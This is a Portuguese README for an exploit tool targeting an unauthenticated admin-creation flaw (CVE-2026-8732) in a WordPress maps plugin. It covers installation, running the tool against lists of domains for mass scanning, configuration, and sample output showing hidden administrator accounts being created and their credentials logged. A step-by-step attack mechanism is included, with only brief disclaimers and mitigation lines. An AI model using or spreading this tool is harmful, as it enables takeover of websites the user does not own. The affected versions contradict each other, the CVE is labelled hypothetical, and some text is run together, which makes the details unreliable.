
WP Maps Pro <= 6.1.0 - Escalação de Privilégios Não Autenticada via Criação de Conta de Administrador na Ação AJAX wpgmp_temp_access_ajax
Esta ferramenta explora CVE-2026-8732, uma vulnerabilidade no plugin WP Google Map Pro para WordPress. A vulnerabilidade permite que um invasor não autenticado obtenha um wpmp_token válido por meio de um endpoint AJAX (admin-ajax.php?action=wpgmp_temp_access_ajax). Usando este token, um invasor pode acessar o painel de administração do WordPress e criar um novo usuário administrador.
A ferramenta realiza varredura em massa a partir de uma lista de domínios, extrai o nonce e o token e cria automaticamente uma conta de administrador oculta em sites vulneráveis. Os resultados são salvos em tempo real com detalhes completos do token.
⚠️ AVISO: Esta ferramenta é apenas para testes de segurança educacionais e autorizados. Use apenas em sistemas de sua propriedade ou com permissão explícita para testar. O autor não é responsável por qualquer uso indevido.
Mais avisos podem ser vistos no aviso legal na página do Jenderal92. Você pode verificar AQUI !!!
admin_created.txthttp:// e https://requestsInstale a biblioteca necessária:
pip install requests
🚀 Instalação
git clone https://github.com/Jenderal92/CVE-2026-8732.git
cd CVE-2026-8732
🎯 Uso
Prepare um arquivo de lista de alvos (um domínio por linha):
example.com
https://target-website.com
http://vulnerable-site.org
Execute o scanner:
python2 exploit.py targets.txt
Arquivos de Saída
Arquivo Conteúdo res.txt Domínios vulneráveis com token completo e URL de redirecionamento (se houver) admin_created.txt Credenciais de administrador criadas com sucesso (domínio, usuário, senha, email)
Exemplo de Saída
[*] Checking: https://example.com
[VULNERABLE] https://example.com -> Token found
[*] https://example.com -> Accessing redirect URL...
[+] https://example.com -> Admin created: securityaudit_1734567890 / StrongP@ssw0rd123!
⚙️ Configuração
Edite as seguintes variáveis dentro do script:
TIMEOUT = 10 # Request timeout in seconds
JUMLAH_THREAD = 10 # Number of concurrent threads
OUTPUT_FILE = "res.txt" # File for vulnerable results
ADMIN_FILE = "admin_created.txt"
BASE_USERNAME = "securityaudit"
NEW_PASSWORD = "StrongP@ssw0rd123!"
NEW_EMAIL = "[email protected]"
🧠 Como Funciona
wpgmp_local ou fc-call-nonce do HTML./wp-admin/admin-ajax.php com action=wpgmp_temp_access_ajax e o nonce obtido./wp-admin/user-new.php, extrai _wpnonce_create-user e envia um POST para criar um novo usuário administrador.users.php ou procura pelo novo nome de usuário na lista de usuários para confirmar o sucesso.🛡️ Mitigação
wpgmp_temp_access_ajax por meio de código personalizado ou firewall.admin-ajax.php.⭐ Aviso Legal
Este software é fornecido "COMO ESTÁ", sem qualquer garantia. Todo o risco quanto à qualidade e desempenho do software é por sua conta. Use com responsabilidade e apenas em sistemas que você está autorizado a testar.
| Campo | Valor |
|---|
| ID do CVE | CVE-2026-8732 (hipotético para este plugin) |
| Plugin Afetado | WP Google Map Pro (versões <= 1.5.0) |
| Tipo de Vulnerabilidade | Controle de Acesso Quebrado / Escalação de Privilégio |
| Vetor de Ataque | Não autenticado, Remoto |
| Impacto | Assunção total do site via criação de conta de administrador |